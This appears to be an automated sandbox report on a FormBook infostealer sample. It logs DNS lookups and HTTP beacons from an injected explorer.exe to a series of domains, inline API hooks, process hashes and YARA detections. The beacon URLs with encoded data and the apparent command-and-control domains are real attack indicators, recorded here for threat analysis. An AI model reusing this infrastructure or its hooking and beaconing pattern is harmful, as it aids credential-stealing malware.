                                                                                            Apr 8, 2024 15:25:06.359637976 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.359756947 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.483475924 CEST804972113.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.509553909 CEST804972113.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.509571075 CEST804972113.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.509697914 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.509738922 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.516792059 CEST804972113.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.516880989 CEST4972180192.168.2.913.248.169.48
                                                                                            Apr 8, 2024 15:25:06.633487940 CEST804972113.248.169.48192.168.2.9
                                                                                            Apr 8, 2024 15:25:48.043667078 CEST4972280192.168.2.966.147.240.91
                                                                                            Apr 8, 2024 15:25:48.238926888 CEST804972266.147.240.91192.168.2.9
                                                                                            Apr 8, 2024 15:25:48.239022970 CEST4972280192.168.2.966.147.240.91
                                                                                            Apr 8, 2024 15:25:48.239106894 CEST4972280192.168.2.966.147.240.91
                                                                                            Apr 8, 2024 15:25:48.434309959 CEST804972266.147.240.91192.168.2.9
                                                                                            Apr 8, 2024 15:25:48.442342043 CEST804972266.147.240.91192.168.2.9
                                                                                            Apr 8, 2024 15:25:48.442388058 CEST804972266.147.240.91192.168.2.9
                                                                                            Apr 8, 2024 15:25:48.442498922 CEST4972280192.168.2.966.147.240.91
                                                                                            Apr 8, 2024 15:25:48.442498922 CEST4972280192.168.2.966.147.240.91
                                                                                            Apr 8, 2024 15:25:48.637763023 CEST804972266.147.240.91192.168.2.9
                                                                                            Apr 8, 2024 15:26:08.479686022 CEST4972380192.168.2.9172.67.154.171
                                                                                            Apr 8, 2024 15:26:08.603954077 CEST8049723172.67.154.171192.168.2.9
                                                                                            Apr 8, 2024 15:26:08.604023933 CEST4972380192.168.2.9172.67.154.171
                                                                                            Apr 8, 2024 15:26:08.604254007 CEST4972380192.168.2.9172.67.154.171
                                                                                            Apr 8, 2024 15:26:08.728358984 CEST8049723172.67.154.171192.168.2.9
                                                                                            Apr 8, 2024 15:26:09.253618956 CEST8049723172.67.154.171192.168.2.9
                                                                                            Apr 8, 2024 15:26:09.254127979 CEST8049723172.67.154.171192.168.2.9
                                                                                            Apr 8, 2024 15:26:09.259459019 CEST4972380192.168.2.9172.67.154.171
                                                                                            Apr 8, 2024 15:26:10.103084087 CEST4972380192.168.2.9172.67.154.171
                                                                                            TimestampSource PortDest PortSource IPDest IP
                                                                                            Apr 8, 2024 15:23:02.560512066 CEST5273453192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:23:02.692785025 CEST53527341.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:23:22.981045008 CEST5030053192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:23:23.117042065 CEST53503001.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:23:43.184411049 CEST5231553192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:23:43.342160940 CEST53523151.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:24:04.341629982 CEST5708153192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:24:04.784672976 CEST53570811.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:24:24.937551975 CEST5808353192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:24:25.065148115 CEST53580831.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:24:45.515527964 CEST5157453192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:24:45.805449009 CEST53515741.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:25:06.105315924 CEST6151153192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:25:06.234658957 CEST53615111.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:25:26.861522913 CEST5231753192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:25:27.020524025 CEST53523171.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:25:47.727428913 CEST6191053192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:25:48.042604923 CEST53619101.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:26:08.307924032 CEST5757653192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:26:08.472210884 CEST53575761.1.1.1192.168.2.9
                                                                                            Apr 8, 2024 15:26:29.061269999 CEST6355753192.168.2.91.1.1.1
                                                                                            Apr 8, 2024 15:26:29.909606934 CEST53635571.1.1.1192.168.2.9
                                                                                            TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                            Apr 8, 2024 15:23:02.560512066 CEST192.168.2.91.1.1.10x1b5bStandard query (0)www.kidscircle.shopA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:22.981045008 CEST192.168.2.91.1.1.10x663cStandard query (0)www.bombslot-42.coA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:43.184411049 CEST192.168.2.91.1.1.10x9a9Standard query (0)www.erabits.comA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:04.341629982 CEST192.168.2.91.1.1.10x2e84Standard query (0)www.mingshengglass.comA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:24.937551975 CEST192.168.2.91.1.1.10xefbaStandard query (0)www.yoursweets.onlineA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:45.515527964 CEST192.168.2.91.1.1.10x9e40Standard query (0)www.ethicai.proA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:06.105315924 CEST192.168.2.91.1.1.10x9671Standard query (0)www.owletbaby.shopA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:26.861522913 CEST192.168.2.91.1.1.10xc00fStandard query (0)www.mayorii.comA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:47.727428913 CEST192.168.2.91.1.1.10x2569Standard query (0)www.oregonjobs.coA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:26:08.307924032 CEST192.168.2.91.1.1.10x283bStandard query (0)www.helyibudapest.comA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:26:29.061269999 CEST192.168.2.91.1.1.10xbab1Standard query (0)www.poseidoncrm.comA (IP address)IN (0x0001)false
                                                                                            TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                            Apr 8, 2024 15:23:02.692785025 CEST1.1.1.1192.168.2.90x1b5bNo error (0)www.kidscircle.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:02.692785025 CEST1.1.1.1192.168.2.90x1b5bNo error (0)www.kidscircle.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:23.117042065 CEST1.1.1.1192.168.2.90x663cNo error (0)www.bombslot-42.co104.21.56.10A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:23.117042065 CEST1.1.1.1192.168.2.90x663cNo error (0)www.bombslot-42.co172.67.175.171A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:23:43.342160940 CEST1.1.1.1192.168.2.90x9a9Name error (3)www.erabits.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:04.784672976 CEST1.1.1.1192.168.2.90x2e84No error (0)www.mingshengglass.com102.134.40.151A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:25.065148115 CEST1.1.1.1192.168.2.90xefbaName error (3)www.yoursweets.onlinenonenoneA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:45.805449009 CEST1.1.1.1192.168.2.90x9e40No error (0)www.ethicai.proethicai.proCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:45.805449009 CEST1.1.1.1192.168.2.90x9e40No error (0)ethicai.pro3.33.130.190A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:24:45.805449009 CEST1.1.1.1192.168.2.90x9e40No error (0)ethicai.pro15.197.148.33A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:06.234658957 CEST1.1.1.1192.168.2.90x9671No error (0)www.owletbaby.shop13.248.169.48A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:06.234658957 CEST1.1.1.1192.168.2.90x9671No error (0)www.owletbaby.shop76.223.54.146A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:27.020524025 CEST1.1.1.1192.168.2.90xc00fName error (3)www.mayorii.comnonenoneA (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:48.042604923 CEST1.1.1.1192.168.2.90x2569No error (0)www.oregonjobs.cooregonjobs.coCNAME (Canonical name)IN (0x0001)false
                                                                                            Apr 8, 2024 15:25:48.042604923 CEST1.1.1.1192.168.2.90x2569No error (0)oregonjobs.co66.147.240.91A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:26:08.472210884 CEST1.1.1.1192.168.2.90x283bNo error (0)www.helyibudapest.com172.67.154.171A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:26:08.472210884 CEST1.1.1.1192.168.2.90x283bNo error (0)www.helyibudapest.com104.21.5.190A (IP address)IN (0x0001)false
                                                                                            Apr 8, 2024 15:26:29.909606934 CEST1.1.1.1192.168.2.90xbab1Server failure (2)www.poseidoncrm.comnonenoneA (IP address)IN (0x0001)false
                                                                                            • www.kidscircle.shop
                                                                                            • www.bombslot-42.co
                                                                                            • www.mingshengglass.com
                                                                                            • www.ethicai.pro
                                                                                            • www.owletbaby.shop
                                                                                            • www.oregonjobs.co
                                                                                            • www.helyibudapest.com
                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            0192.168.2.94971613.248.169.48803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:23:02.817331076 CEST171OUTGET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/ HTTP/1.1
                                                                                            Host: www.kidscircle.shop
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:23:02.970737934 CEST349INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Mon, 08 Apr 2024 13:23:02 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 209
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 26 75 54 6d 34 3d 50 4c 4b 63 45 38 78 70 76 68 79 4f 7a 4f 78 4b 6b 65 4c 2f 2b 44 4c 31 6b 4e 49 63 71 33 39 49 49 59 6e 50 38 4f 4f 33 58 58 6a 6c 36 63 69 35 72 58 6d 41 43 78 77 2f 70 7a 2b 34 4d 2b 6d 6c 63 69 41 2f 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R2M=NjOhAHzH5LxTCNrP&uTm4=PLKcE8xpvhyOzOxKkeL/+DL1kNIcq39IIYnP8OO3XXjl6ci5rXmACxw/pz+4M+mlciA/"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            1192.168.2.949718104.21.56.10803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:23:24.247870922 CEST170OUTGET /vr01/?uTm4=CRIcXgDta+9JTffevem10+yBm+uKfejT3UejFVr1Q2sKU73ve+2FIZL4fAb3NdJYnMZe&R2M=NjOhAHzH5LxTCNrP HTTP/1.1
                                                                                            Host: www.bombslot-42.co
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:23:24.621198893 CEST755INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 08 Apr 2024 13:23:24 GMT
                                                                                            Content-Type: text/html; charset=utf-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sj4kR%2FWxTqizZeKzuOtgPoR4qc%2B9UsS9LTHntpDXGYTM7Cf0swEcQjz%2Bf2zU0AMtmKZwgXJYXOfOZdLKBnp6XNrdXPfiUV2l9vKbqirlHETdLc4yuJcepmISOk%2BwVr13SUhP8u8%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 8712925ce9d2a534-MIA
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 61 32 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 38 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a
                                                                                            Data Ascii: a2<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.18.0 (Ubuntu)</center></body></html>
                                                                                            Apr 8, 2024 15:23:24.621220112 CEST5INData Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            2192.168.2.949719102.134.40.151803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:24:04.974062920 CEST174OUTGET /vr01/?uTm4=p/xcNqzHhW+jsc+DeauMV/rjlfuack/vmC9Eop/11cDYDFLPNTQG2lepFRzL3IBjum3b&R2M=NjOhAHzH5LxTCNrP HTTP/1.1
                                                                                            Host: www.mingshengglass.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            3192.168.2.9497203.33.130.190803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:24:45.933979034 CEST167OUTGET /vr01/?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP HTTP/1.1
                                                                                            Host: www.ethicai.pro
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:24:46.087852001 CEST349INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Mon, 08 Apr 2024 13:24:46 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 209
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 75 54 6d 34 3d 6d 64 37 59 77 61 49 59 46 55 6a 61 6a 41 52 50 38 48 37 41 41 35 71 6b 7a 55 34 55 36 53 74 2b 41 6a 57 71 74 63 47 42 76 6d 79 38 69 35 68 34 42 68 79 50 2f 63 44 37 4c 69 56 78 56 72 4f 78 79 66 61 2b 26 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?uTm4=md7YwaIYFUjajARP8H7AA5qkzU4U6St+AjWqtcGBvmy8i5h4BhyP/cD7LiVxVrOxyfa+&R2M=NjOhAHzH5LxTCNrP"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            4192.168.2.94972113.248.169.48803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:25:06.359756947 CEST170OUTGET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL HTTP/1.1
                                                                                            Host: www.owletbaby.shop
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:25:06.509553909 CEST349INHTTP/1.1 200 OK
                                                                                            Server: openresty
                                                                                            Date: Mon, 08 Apr 2024 13:25:06 GMT
                                                                                            Content-Type: text/html
                                                                                            Content-Length: 209
                                                                                            Connection: close
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 52 32 4d 3d 4e 6a 4f 68 41 48 7a 48 35 4c 78 54 43 4e 72 50 26 75 54 6d 34 3d 6f 6d 2b 52 41 6a 38 2b 31 55 30 5a 34 51 35 72 6b 6b 38 62 33 4d 39 4a 52 47 55 4a 32 65 75 50 36 66 30 37 4f 50 51 56 66 7a 6b 32 41 2f 45 54 2f 75 71 52 41 47 54 68 75 53 39 49 78 7a 6e 5a 73 2b 51 4c 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e
                                                                                            Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?R2M=NjOhAHzH5LxTCNrP&uTm4=om+RAj8+1U0Z4Q5rkk8b3M9JRGUJ2euP6f07OPQVfzk2A/ET/uqRAGThuS9IxznZs+QL"}</script></head></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            5192.168.2.94972266.147.240.91803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:25:48.239106894 CEST169OUTGET /vr01/?R2M=NjOhAHzH5LxTCNrP&uTm4=wFZ5enF1tq9XrqHWNXhfStMJiblJh5bHmGRWjDpakqkf/10aPf5zMfbio2tqs2yXyxpi HTTP/1.1
                                                                                            Host: www.oregonjobs.co
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:25:48.442342043 CEST479INHTTP/1.1 404 Not Found
                                                                                            Date: Mon, 08 Apr 2024 13:25:48 GMT
                                                                                            Server: Apache
                                                                                            Content-Length: 315
                                                                                            Connection: close
                                                                                            Content-Type: text/html; charset=iso-8859-1
                                                                                            Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                            Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered while trying to use an ErrorDocument to handle the request.</p></body></html>


                                                                                            Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                            6192.168.2.949723172.67.154.171803504C:\Windows\explorer.exe
                                                                                            TimestampBytes transferredDirectionData
                                                                                            Apr 8, 2024 15:26:08.604254007 CEST173OUTGET /vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP HTTP/1.1
                                                                                            Host: www.helyibudapest.com
                                                                                            Connection: close
                                                                                            Data Raw: 00 00 00 00 00 00 00
                                                                                            Data Ascii:
                                                                                            Apr 8, 2024 15:26:09.253618956 CEST1058INHTTP/1.1 301 Moved Permanently
                                                                                            Date: Mon, 08 Apr 2024 13:26:09 GMT
                                                                                            Content-Type: text/html; charset=UTF-8
                                                                                            Transfer-Encoding: chunked
                                                                                            Connection: close
                                                                                            Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                                                                            Cache-Control: no-cache, must-revalidate, max-age=0
                                                                                            X-UA-Compatible: IE=edge
                                                                                            X-Redirect-By: WordPress
                                                                                            Location: http://helyibudapest.com/vr01/?uTm4=4lP9+b8r1hHYuPjiih6w+ijrcjXpUPjRDd99FwKlJ6rbETvBe77stQ4feUetoD8uHBUT&R2M=NjOhAHzH5LxTCNrP
                                                                                            X-Content-Type-Options: nosniff
                                                                                            X-XSS-Protection: 1; mode=block
                                                                                            X-Frame-Options: SAMEORIGIN
                                                                                            Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                            CF-Cache-Status: DYNAMIC
                                                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=JRih7uQ%2BPIqAs5eQnScCOomhSEPixIahAZtsdW2AGwL1QUVK%2F3k56ptcDMFxBz3WpGN5OkqUyPhVs63HDbOJPBBgNK9W%2F9uAGUIZtBswiWhELMoh2d8ihEl%2Be6Uq2a%2BHp5ZyZA%2FcIPo%3D"}],"group":"cf-nel","max_age":604800}
                                                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                            Server: cloudflare
                                                                                            CF-RAY: 871296602e7f030a-MIA
                                                                                            alt-svc: h3=":443"; ma=86400
                                                                                            Data Raw: 30 0d 0a 0d 0a
                                                                                            Data Ascii: 0


                                                                                            Code Manipulations

                                                                                            Function NameHook TypeActive in Processes
                                                                                            PeekMessageAINLINEexplorer.exe
                                                                                            PeekMessageWINLINEexplorer.exe
                                                                                            GetMessageWINLINEexplorer.exe
                                                                                            GetMessageAINLINEexplorer.exe
                                                                                            Function NameHook TypeNew Data
                                                                                            PeekMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF
                                                                                            PeekMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF
                                                                                            GetMessageWINLINE0x48 0x8B 0xB8 0x8A 0xAE 0xEF
                                                                                            GetMessageAINLINE0x48 0x8B 0xB8 0x82 0x2E 0xEF

                                                                                            Click to jump to process

                                                                                            Click to jump to process

                                                                                            Click to dive into process behavior distribution

                                                                                            Click to jump to process

                                                                                            Target ID:0
                                                                                            Start time:15:22:23
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Users\user\Desktop\hj3YCvtlg7.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\hj3YCvtlg7.exe"
                                                                                            Imagebase:0x8c0000
                                                                                            File size:670'728 bytes
                                                                                            MD5 hash:DAD6E1001C72B68D690FEDF88254F157
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                                                                            • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.1354193570.0000000003DEE000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:3
                                                                                            Start time:15:22:25
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Users\user\Desktop\hj3YCvtlg7.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\hj3YCvtlg7.exe"
                                                                                            Imagebase:0x1b0000
                                                                                            File size:670'728 bytes
                                                                                            MD5 hash:DAD6E1001C72B68D690FEDF88254F157
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:4
                                                                                            Start time:15:22:25
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Users\user\Desktop\hj3YCvtlg7.exe
                                                                                            Wow64 process (32bit):false
                                                                                            Commandline:"C:\Users\user\Desktop\hj3YCvtlg7.exe"
                                                                                            Imagebase:0x250000
                                                                                            File size:670'728 bytes
                                                                                            MD5 hash:DAD6E1001C72B68D690FEDF88254F157
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Reputation:low
                                                                                            Has exited:true

                                                                                            Target ID:5
                                                                                            Start time:15:22:25
                                                                                            Start date:08/04/2024
                                                                                            Path:C:\Users\user\Desktop\hj3YCvtlg7.exe
                                                                                            Wow64 process (32bit):true
                                                                                            Commandline:"C:\Users\user\Desktop\hj3YCvtlg7.exe"
                                                                                            Imagebase:0xbd0000
                                                                                            File size:670'728 bytes
                                                                                            MD5 hash:DAD6E1001C72B68D690FEDF88254F157
                                                                                            Has elevated privileges:true
                                                                                            Has administrator privileges:true
                                                                                            Programmed in:C, C++ or other language
                                                                                            Yara matches:
                                                                                            • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: JoeSecurity_FormBook_1, Description: Yara detected FormBook, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                            • Rule: Windows_Trojan_Formbook_1112e116, Description: unknown, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: unknown
                                                                                            • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.1404667861.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
